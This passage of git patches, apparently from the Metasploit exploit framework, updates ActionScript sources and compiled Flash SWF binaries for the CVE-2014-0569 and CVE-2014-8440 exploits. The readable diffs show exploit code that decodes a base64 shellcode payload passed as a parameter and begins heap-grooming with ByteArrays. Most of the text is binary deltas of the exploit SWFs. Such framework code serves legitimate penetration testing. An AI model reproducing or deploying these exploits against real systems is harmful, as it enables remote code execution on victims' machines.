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
W?260(Dkz>#v4^Bjr6T{@G--hXMqkSS

diff --git a/external/source/exploits/CVE-2014-0569/Main.as b/external/source/exploits/CVE-2014-0569/Main.as
index 5a7003b256..9c482e52a0 100755
--- a/external/source/exploits/CVE-2014-0569/Main.as
+++ b/external/source/exploits/CVE-2014-0569/Main.as
@@ -31,10 +31,13 @@ package
 		{
 			var i:uint = 0
 			var j:uint = 0
-			
-			b64.decode(LoaderInfo(this.root.loaderInfo).parameters.sh)
-			payload = b64.toByteArray().toString();
-			
+						
+			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
+            var pattern:RegExp = / /g;
+            b64_payload = b64_payload.replace(pattern, "+")
+            b64.decode(b64_payload)
+            payload = b64.toByteArray().toString()
+            
 			for (i = 0; i < defrag.length; i++) {
 				defrag[i] = new ByteArray()
 				defrag[i].length = BYTE_ARRAY_SIZE

From da362914e23dada7da61a1ee6ed8d4c9caba61b3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 15:50:31 -0500
Subject: [PATCH 0200/1013] Fix indentation

---
 external/source/exploits/CVE-2014-0569/Main.as | 11 +++++------
 1 file changed, 5 insertions(+), 6 deletions(-)

diff --git a/external/source/exploits/CVE-2014-0569/Main.as b/external/source/exploits/CVE-2014-0569/Main.as
index 9c482e52a0..4ac48e2cec 100755
--- a/external/source/exploits/CVE-2014-0569/Main.as
+++ b/external/source/exploits/CVE-2014-0569/Main.as
@@ -31,13 +31,12 @@ package
 		{
 			var i:uint = 0
 			var j:uint = 0
-						
+			
 			var b64_payload:String = LoaderInfo(this.root.loaderInfo).parameters.sh
-            var pattern:RegExp = / /g;
-            b64_payload = b64_payload.replace(pattern, "+")
-            b64.decode(b64_payload)
-            payload = b64.toByteArray().toString()
-            
+			var pattern:RegExp = / /g;
+			b64_payload = b64_payload.replace(pattern, "+")
+			b64.decode(b64_payload)
+			payload = b64.toByteArray().toString()
 			for (i = 0; i < defrag.length; i++) {
 				defrag[i] = new ByteArray()
 				defrag[i].length = BYTE_ARRAY_SIZE

From 5c8c5aef376fc1face33f6f9d66b81599b51e7a3 Mon Sep 17 00:00:00 2001
From: jvazquez-r7 <juan_vazquez@rapid7.com>
Date: Tue, 26 May 2015 16:05:08 -0500
Subject: [PATCH 0201/1013] Fix CVE-2014-8440

---
 data/exploits/CVE-2014-8440/msf.swf           | Bin 18605 -> 18612 bytes
 external/source/exploits/CVE-2014-8440/Msf.as |   7 +++++--
 2 files changed, 5 insertions(+), 2 deletions(-)

diff --git a/data/exploits/CVE-2014-8440/msf.swf b/data/exploits/CVE-2014-8440/msf.swf
index 823490c7e760000194e33de6d696629415e0befb..c6e47d226d51239e078fece012f402ad019ec62f 100755
GIT binary patch
delta 18475
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
